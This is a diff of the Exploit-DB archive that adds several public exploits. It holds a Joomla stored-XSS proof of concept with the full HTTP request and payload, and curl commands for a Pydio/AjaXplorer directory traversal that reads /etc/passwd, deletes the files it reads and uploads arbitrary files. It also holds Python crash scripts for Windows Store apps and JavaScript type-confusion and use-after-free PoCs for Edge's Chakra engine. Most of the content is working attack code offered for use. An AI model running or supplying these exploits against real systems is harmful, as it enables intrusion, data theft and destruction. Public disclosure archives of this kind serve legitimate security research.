[-] Name:favicon.ico / Size:4286
[-] Name:friendly.php / Size:2047
[-] Name:gadget.php / Size:2864
[-] Name:includes.php / Size:1575
[-] Name:index.php / Size:7343
[-] Name:l.php / Size:119
*-----------------------------*

86
exploits/php/webapps/46200.txt Normal file
View file

@ -0,0 +1,86 @@
# Exploit Title: [Joomla Global Configuration Text Filter settings Stored XSS Vulnerability]
# Date: [18/01/2019]
# Exploit Author: [Praveen Sutar] , Twitter: @praveensutar123
# Vendor Homepage: [https://www.joomla.org/]
# Affected Versions: [Joomla versions 2.5.0 through 3.9.1]
# Tested on: [Joomla 3.9.1]
# CVE : [CVE-2019-6263]
# Vendor Advisory: [https://developer.joomla.org/security-centre/762-20190103-core-stored-xss-issue-in-the-global-configuration-textfilter-settings]
# Author Blog: [http://awesomehackers.org/2019/01/18/cve-2019-6263-joomla-exploit-poc/]
==================
#Product:-
==================
The Flexible Platform Empowering Website Creators. Joomla! is an award-winning content management system (CMS), which enables you to build web sites and powerful online applications.
==================
#Vulnerability:-
==================
Joomla Core - Stored XSS issue in the Global Configuration textfilter settings.
========================
#Vulnerability Details:-
========================
=====================================================================================================================================================
1. Joomla Core - Stored XSS issue in the Global Configuration textfilter settings (CVE-2019-6263)
=====================================================================================================================================================
Joomla failes to perform adequate checks at the Global Configuration Text Filter settings which allows a stored XSS.
#Proof-Of-Concept:
------------------
1. Login to Joomla administrator console
2. Navigate to System -> Global Configuration -> Text Filters
3. Add following payload in Filter Tags2 with No HTML (Filter Type) as Public (Filter Group):
jform[filters][1][filter_tags]=ss"><img+src=+xx+onerror=alert(7575)><
==========
Request :
==========
POST /administrator/index.php?option=com_config HTTP/1.1
Host: <target_ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<target_ip>/administrator/index.php?option=com_config
Content-Type: application/x-www-form-urlencoded
Content-Length: 4303
Connection: close
Cookie: wp-settings-time-1=1540363679; 05e3b315128406acf7dd996046a180f8=__SITE__; 7bb05cf41807f1d0136fbae285e8a16c=1; 783fff54c324d89891f303b51230c499=vnrnl8bo3u62d25ak8tqbruhs2
Upgrade-Insecure-Requests: 1
jform%5Bsitename%5D=testjoomla&jform%5Boffline%5D=0&jform%5Bdisplay_offline_message%5D=1&jform%5Boffline_message%5D=This+site+is+down+for+maintenance.%3Cbr+%2F%3EPlease+check+back+again+soon.&jform%5Boffline_image%5D=&jform%5Bfrontediting%5D=1&jform%5Beditor%5D=tinymce&jform%5Bcaptcha%5D=0&jform%5Baccess%5D=1&jform%5Blist_limit%5D=20&jform%5Bfeed_limit%5D=10&jform%5Bfeed_email%5D=none&jform%5BMetaDesc%5D=adsadsa&jform%5BMetaKeys%5D=&jform%5Brobots%5D=&jform%5BMetaRights%5D=&jform%5BMetaAuthor%5D=1&jform%5BMetaVersion%5D=0&jform%5Bsef%5D=1&jform%5Bsef_rewrite%5D=0&jform%5Bsef_suffix%5D=0&jform%5Bunicodeslugs%5D=0&jform%5Bsitename_pagetitles%5D=0&jform%5Bcookie_domain%5D=&jform%5Bcookie_path%5D=&jform%5Blog_path%5D=%2Fvar%2Fwww%2Fhtml%2Fadministrator%2Flogs&jform%5Bhelpurl%5D=https%3A%2F%2Fhelp.joomla.org%2Fproxy%3Fkeyref%3DHelp%7Bmajor%7D%7Bminor%7D%3A%7Bkeyref%7D%26lang%3D%7Blangcode%7D&jform%5Bdebug%5D=0&jform%5Bdebug_lang%5D=0&jform%5Bdebug_lang_const%5D=1&jform%5Bcache_handler%5D=file&jform%5Bcache_path%5D=&jform%5Bmemcache_persist%5D=1&jform%5Bmemcache_compress%5D=0&jform%5Bmemcache_server_host%5D=localhost&jform%5Bmemcache_server_port%5D=11211&jform%5Bmemcached_persist%5D=1&jform%5Bmemcached_compress%5D=0&jform%5Bmemcached_server_host%5D=localhost&jform%5Bmemcached_server_port%5D=11211&jform%5Bredis_persist%5D=1&jform%5Bredis_server_host%5D=localhost&jform%5Bredis_server_port%5D=6379&jform%5Bredis_server_auth%5D=&jform%5Bredis_server_db%5D=0&jform%5Bcachetime%5D=15&jform%5Bcache_platformprefix%5D=0&jform%5Bcaching%5D=0&jform%5Bsession_handler%5D=database&jform%5Bsession_memcache_server_host%5D=localhost&jform%5Bsession_memcache_server_port%5D=11211&jform%5Bsession_memcached_server_host%5D=localhost&jform%5Bsession_memcached_server_port%5D=11211&jform%5Bsession_redis_persist%5D=1&jform%5Bsession_redis_server_host%5D=localhost&jform%5Bsession_redis_server_port%5D=6379&jform%5Bsession_redis_server_auth%5D=&jform%5Bsession_redis_server_db%5D=0&jform%5Blifetime%5D=15&jform%5Bshared_session%5D=0&jform%5Btmp_path%5D=%2Fvar%2Fwww%2Fhtml%2Ftmp&jform%5Bgzip%5D=0&jform%5Berror_reporting%5D=default&jform%5Bforce_ssl%5D=0&jform%5Boffset%5D=UTC&jform%5Bftp_enable%5D=0&jform%5Bftp_host%5D=&jform%5Bftp_port%5D=&jform%5Bftp_user%5D=&jform%5Bftp_pass%5D=&jform%5Bftp_root%5D=&jform%5Bproxy_enable%5D=0&jform%5Bproxy_host%5D=&jform%5Bproxy_port%5D=&jform%5Bproxy_user%5D=&jform%5Bproxy_pass%5D=&jform%5Bdbtype%5D=mysqli&jform%5Bhost%5D=localhost&jform%5Buser%5D=root&jform%5Bdb%5D=joomla&jform%5Bdbprefix%5D=isadh_&jform%5Bmailonline%5D=1&jform%5Bmassmailoff%5D=0&jform%5Bmailfrom%5D=test%40example.com&jform%5Bfromname%5D=testjoomla&jform%5Breplyto%5D=&jform%5Breplytoname%5D=&jform%5Bmailer%5D=mail&jform%5Bsendmail%5D=%2Fusr%2Fsbin%2Fsendmail&jform%5Bsmtphost%5D=localhost&jform%5Bsmtpport%5D=25&jform%5Bsmtpsecure%5D=none&jform%5Bsmtpauth%5D=0&jform%5Bsmtpuser%5D=&jform%5Bsmtppass%5D=&jform%5Bfilters%5D%5B1%5D%5Bfilter_type%5D=BL&jform%5Bfilters%5D%5B1%5D%5Bfilter_tags%5D=ss%22%3E%3Cimg+src%3D+xx+onerror%3Dalert%287575%29%3E%3C&jform%5Bfilters%5D%5B1%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B9%5D%5Bfilter_type%5D=BL&jform%5Bfilters%5D%5B9%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B9%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B6%5D%5Bfilter_type%5D=BL&jform%5Bfilters%5D%5B6%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B6%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B7%5D%5Bfilter_type%5D=BL&jform%5Bfilters%5D%5B7%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B7%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B2%5D%5Bfilter_type%5D=NH&jform%5Bfilters%5D%5B2%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B2%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B3%5D%5Bfilter_type%5D=BL&jform%5Bfilters%5D%5B3%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B3%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B4%5D%5Bfilter_type%5D=BL&jform%5Bfilters%5D%5B4%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B4%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B5%5D%5Bfilter_type%5D=BL&jform%5Bfilters%5D%5B5%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B5%5D%5Bfilter_attributes%5D=&jform%5Bfilters%5D%5B8%5D%5Bfilter_type%5D=NONE&jform%5Bfilters%5D%5B8%5D%5Bfilter_tags%5D=&jform%5Bfilters%5D%5B8%5D%5Bfilter_attributes%5D=&task=config.save.application.apply&fc4982bad4604f5ea5d8adc003a6034c=1
4. Save the Changes.
5. Navigate to Global Configuration page and an alert box will pop up. Here's the response body:
==========
Response:
==========
HTTP/1.1 303 See other
Date: Fri, 18 Jan 2019 07:30:48 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
Location: /administrator/index.php?option=com_config
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Last-Modified: Fri, 18 Jan 2019 07:30:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
===================================
#Vulnerability Disclosure Timeline:
===================================
11/2018: First email to disclose the vulnerability to Joomla.
12/2018: Vendor confirmed vulnerability.
01/2019: Vendor published advisory and released a fix.

54
exploits/php/webapps/46206.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: Unauthenticated Arbitrary File Upload Vulnerability In Pydio/AjaXplorer 5.0.3 3.3.5
# Date: 01/18/2019
# Exploit Author: @_jazz______
# Vendor Homepage: https://pydio.com/
# Software Link: https://sourceforge.net/projects/ajaxplorer/files/ajaxplorer/stable-channel/4.2.3/ajaxplorer-core-4.2.3.tar.gz/download
# Version: ajaXplorer before 5.0.4
# Tested on: ajaXplorer 4.2.3 on Debian 9 update 5
# References: https://web.archive.org/web/20140430075145/http://www.redfsec.com/CVE-2013-6227
# CVE: CVE-2013-6227
###########################################################################################
Affected file:
/plugins/editor.zoho/agent/save_zoho.php
<?php
$vars = array_merge($_GET, $_POST);
if(!isSet($vars["ajxp_action"]) && isset($vars["id"]) && isset($vars["format"])){
$filezoho = $_FILES['content']["tmp_name"];
$cleanId = str_replace(array("..", "/"), "", $vars["id"]);
move_uploaded_file($filezoho, "files/".$cleanId.".".$vars["format"]);
}else if($vars["ajxp_action"] == "get_file" && isSet($vars["name"])){
if(file_exists("files/".$vars["name"])){
readfile("files/".$vars["name"]);
unlink("files/".$vars["name"]);
}
}
?>
Option 1: If "ajxp_action" is not set, upload "content" file to files/id.format.
The code does not sanitize "format" parameter before passing it as an argument to "move_uploaded_file",
thus introducing an opportunity to upload files to any arbitrary location via directory traversal
Note: User should have permission to write on the desired location.
Option 2: If "ajxp_action" is set to "get_file", read the file from "files/name" and then ERASE IT (unlink).
Again, the code does not sanitize the "name" parameter, making it also vulnerable to directory traversal.
"files" directory's location is by default /plugins/editor.zoho/agent/files
A default location for reading/uploading files is /data/files/
###########################################################################################
[1] [CAUTION!] Read arbitrary files
curl "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=<file_relative_path>"
e.g. curl "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=../../../../../../../../etc/passwd"
[USE WITH CAUTION] This is a destructive function. Files retrieved WILL be erased after reading, provided that the file is writable by the user which the web server's process is running as.
[2] Arbitrary File Upload
*step 1 - Upload the file to the server*
# curl -F 'content=@<filename_from_attacker_host>;type=<filetype>;filename=\"<filename>\"' "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?id=&format=<upload_to_file_relative_path>"
e.g. # curl -F 'content=@test.html;type=text/html;filename=\"test.html\"' "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?id=&format=./../../../data/files/test.html"

25
exploits/windows/dos/46194.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: Watchr 1.1.0.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9PN12GNX62VZ
# Version: 1.1.0.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "watchr.txt"
# Copy the text from the generated watchr.txt file to clipboard
# Paste the text in the search bar and click search
# App will now crash
buffer = "A" * 8145
payload = buffer
try:
f=open("watchr.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

25
exploits/windows/dos/46195.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: One Search 1.1.0.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9PMR5QNS5LTL
# Version: 1.1.0.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# App will now crash
buffer = "A" * 950
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

25
exploits/windows/dos/46196.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: Eco Search 1.0.2.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9N05DCQP5C3W
# Version: 1.0.2.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# App will now crash
buffer = "A" * 950
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

26
exploits/windows/dos/46197.py Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: 7 Tik 1.0.1.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NQL2QC8S935
# Version: 1.0.1.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Go to search page
# Paste the text in the search bar and click search
# App will now crash
buffer = "A" * 7700
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

25
exploits/windows/dos/46198.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: VPN Browser+ 1.1.0.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NFFFFS5Z2C7
# Version: 1.1.0.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# App will now crash
buffer = "A" * 5800
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

25
exploits/windows/dos/46199.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: FastTube 1.0.1.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9MXS9JVDP25V
# Version: 1.0.1.0
# Tested on: Windows 10
# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# App will now crash
buffer = "A" * 1900
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

27
exploits/windows/dos/46202.js Normal file
View file

@ -0,0 +1,27 @@
/*
In Chakra, if you add a numeric property to an object having inlined properties, it will start transition to a new type where the space for some of previously inlined properties become for the pointer to the property slots and the pointer to the object array which stores numeric properties. For this reason, when it optimizes an InlineArrayPush instruction which might start transition, it needs to kill corresponding type symbols to prevent type confusion. But it doesn't, so it can lead to type confusion.
PoC:
*/
function opt(a, b) {
a.b = 2;
b.push(0);
a.a = 0x1234;
}
function main() {
Object.prototype.push = Array.prototype.push;
for (let i = 0; i < 1000; i++) {
let a = {a: 1, b: 2};
opt(a, {});
}
let o = {a: 1, b: 2};
opt(o, o);
print(o.a);
}
main();

61
exploits/windows/dos/46203.txt Normal file
View file

@ -0,0 +1,61 @@
NewScObjectNoCtor and InitProto opcodes are treated as having no side effects, but actually they can have via the SetIsPrototype method of the type handler that can cause transition to a new type. This can lead to type confusion in the JITed code.
In the PoC, it overwrites the pointer to property slots with 0x1000000001234.
PoC for NewScObjectNoCtor:
function cons() {
}
function opt(o, value) {
o.b = 1;
new cons();
o.a = value;
}
function main() {
for (let i = 0; i < 2000; i++) {
cons.prototype = {};
let o = {a: 1, b: 2};
opt(o, {});
}
let o = {a: 1, b: 2};
cons.prototype = o;
opt(o, 0x1234);
print(o.a);
}
main();
PoC for InitProto:
function opt(o, proto, value) {
o.b = 1;
let tmp = {__proto__: proto};
o.a = value;
}
function main() {
for (let i = 0; i < 2000; i++) {
let o = {a: 1, b: 2};
opt(o, {}, {});
}
let o = {a: 1, b: 2};
opt(o, o, 0x1234);
print(o.a);
}
main();

36
exploits/windows/dos/46204.js Normal file
View file

@ -0,0 +1,36 @@
/*
Issue description
This is similar to issue 1702 (https://www.exploit-db.com/exploits/46203) . This time, it uses an InitClass instruction to reach the SetIsPrototype method.
PoC:
*/
function opt(o, c, value) {
o.b = 1;
class A extends c {
}
o.a = value;
}
function main() {
for (let i = 0; i < 2000; i++) {
let o = {a: 1, b: 2};
opt(o, (function () {}), {});
}
let o = {a: 1, b: 2};
let cons = function () {};
cons.prototype = o;
opt(o, cons, 0x1234);
print(o.a);
}
main();

35
exploits/windows/dos/46205.js Normal file
View file

@ -0,0 +1,35 @@
/*
The JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode method is used to execute JsBuiltIn.js which initializes some builtin objects. Because it's essentially written in JavaScript, it needs to clear the disable-implicit-call flag before calling the JavaScript code, otherwise it might not work properly. The problem is, it doesn't restore the prevous status of the flag after the call. As setting the flag can prevent stack-allocated objects from leaking, this clearing-the-flag bug can lead to a stack-based use-after-free.
To exploit this bug, it's needed to build a chain that first clears the flag by calling the vulnerable method and then leaks the stack-allocated object. This is done with the Error.prototype.toString method (marked as having no side effects) which calls the "toString" method on the "name" property and the "message" property of the "this" object. So when it accesses the "name" property, it clears the flag and leaks the "this" object when it accesses the "message" property.
PoC:
*/
function opt() {
let o = {}; // stack-allocated object
o.x; // under with DisableImplicitFlags set
}
function main() {
for (let i = 0; i < 10000; i++) {
opt();
}
let leaked_stack_object = null;
let object_prototype = ({}).__proto__;
object_prototype.__defineGetter__('x', Error.prototype.toString);
object_prototype.__defineGetter__('message', function () {
delete object_prototype.message;
leaked_stack_object = this;
});
object_prototype.name = Array.prototype; // access to Array.prototype will call JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode.
opt();
alert(leaked_stack_object);
}
main();

17
files_exploits.csv
View file

@ -6258,6 +6258,16 @@ id,file,description,date,author,type,platform,port
46181,exploits/multiple/dos/46181.html,"Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory in Invalid Array Length",2019-01-16,"Bogdan Kurinnoy",dos,multiple,
46183,exploits/multiple/dos/46183.js,"WebKit JSC JIT - GetIndexedPropertyStorage Use-After-Free",2019-01-16,"Google Security Research",dos,multiple,
46184,exploits/windows/dos/46184.txt,"Microsoft Windows 10 - 'RestrictedErrorInfo' Unmarshal Section Handle Use-After-Free",2019-01-16,"Google Security Research",dos,windows,
46194,exploits/windows/dos/46194.py,"Watchr 1.1.0.0 - Denial of Service (PoC)",2019-01-18,0xB9,dos,windows,
46195,exploits/windows/dos/46195.py,"One Search 1.1.0.0 - Denial of Service (PoC)",2019-01-18,0xB9,dos,windows,
46196,exploits/windows/dos/46196.py,"Eco Search 1.0.2.0 - Denial of Service (PoC)",2019-01-18,0xB9,dos,windows,
46197,exploits/windows/dos/46197.py,"7 Tik 1.0.1.0 - Denial of Service (PoC)",2019-01-18,0xB9,dos,windows,
46198,exploits/windows/dos/46198.py,"VPN Browser+ 1.1.0.0 - Denial of Service (PoC)",2019-01-18,0xB9,dos,windows,
46199,exploits/windows/dos/46199.py,"FastTube 1.0.1.0 - Denial of Service (PoC)",2019-01-18,0xB9,dos,windows,
46202,exploits/windows/dos/46202.js,"Microsoft Edge Chakra - 'InlineArrayPush' Type Confusion",2019-01-18,"Google Security Research",dos,windows,
46203,exploits/windows/dos/46203.txt,"Microsoft Edge Chakra - 'NewScObjectNoCtor' or 'InitProto' Type Confusion",2019-01-18,"Google Security Research",dos,windows,
46204,exploits/windows/dos/46204.js,"Microsoft Edge Chakra - 'InitClass' Type Confusion",2019-01-18,"Google Security Research",dos,windows,
46205,exploits/windows/dos/46205.js,"Microsoft Edge Chakra - 'JsBuiltInEngineInterfaceExtensionObject::InjectJsBuiltInLibraryCode' Use-After-Free",2019-01-18,"Google Security Research",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -17096,6 +17106,8 @@ id,file,description,date,author,type,platform,port
46074,exploits/linux/remote/46074.rb,"Hashicorp Consul - Remote Command Execution via Services API (Metasploit)",2019-01-02,Metasploit,remote,linux,
46075,exploits/python/remote/46075.rb,"Mailcleaner - Authenticated Remote Code Execution (Metasploit)",2019-01-07,"Mehmet Ince",remote,python,443
46143,exploits/hardware/remote/46143.rb,"Hootoo HT-05 - Remote Code Execution (Metasploit)",2019-01-14,"Andrei Manole",remote,hardware,
46201,exploits/cgi/remote/46201.rb,"Webmin 1.900 - Remote Command Execution (Metasploit)",2019-01-18,AkkuS,remote,cgi,10000
46193,exploits/multiple/remote/46193.py,"SCP Client - Multiple Vulnerabilities (SSHtranger Things)",2019-01-18,"Mark E. Haase",remote,multiple,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40667,3 +40679,8 @@ id,file,description,date,author,type,platform,port
46180,exploits/hardware/webapps/46180.html,"Coship Wireless Router 4.0.0.48 / 4.0.0.40 / 5.0.0.54 / 5.0.0.55 / 10.0.0.49 - Unauthenticated Admin Password Reset",2019-01-16,"Adithyan AK",webapps,hardware,80
46182,exploits/php/webapps/46182.py,"Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit",2019-01-16,"Larry W. Cashdollar",webapps,php,80
46187,exploits/multiple/webapps/46187.txt,"Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting",2019-01-17,"Mohamed M.Fouad",webapps,multiple,443
46190,exploits/php/webapps/46190.txt,"SeoToaster Ecommerce / CRM / CMS 3.0.0 - Local File Inclusion",2019-01-18,"Ihsan Sencan",webapps,php,80
46191,exploits/php/webapps/46191.txt,"phpTransformer 2016.9 - SQL Injection",2019-01-18,"Ihsan Sencan",webapps,php,80
46192,exploits/php/webapps/46192.txt,"phpTransformer 2016.9 - Directory Traversal",2019-01-18,"Ihsan Sencan",webapps,php,80
46200,exploits/php/webapps/46200.txt,"Joomla! Core 3.9.1 - Persistent Cross-Site Scripting in Global Configuration Textfilter Settings",2019-01-18,"Praveen Sutar",webapps,php,80
46206,exploits/php/webapps/46206.txt,"Pydio / AjaXplorer < 5.0.4 - Unauthenticated Arbitrary File Upload",2019-01-18,_jazz______,webapps,php,80

Can't render this file because it is too large.